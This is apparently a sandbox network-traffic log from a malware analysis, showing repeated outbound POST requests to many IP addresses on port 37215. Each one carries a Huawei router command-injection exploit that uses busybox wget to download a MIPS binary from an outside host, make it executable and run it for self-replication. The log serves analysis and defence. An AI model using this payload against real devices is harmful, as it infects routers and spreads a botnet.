                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1897192.168.2.1346068157.195.191.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.653033972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1898192.168.2.1358690157.103.107.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.653085947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1899192.168.2.1342470197.34.135.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.653126001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1900192.168.2.1360486157.195.209.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.653422117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1901192.168.2.133347441.60.191.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.653481007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1902192.168.2.1358916157.225.65.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.653496027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1903192.168.2.1348772197.50.33.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.653894901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1904192.168.2.1337990197.165.72.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.653963089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1905192.168.2.133617441.11.79.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.654825926 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1906192.168.2.1360426197.103.23.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.654867887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 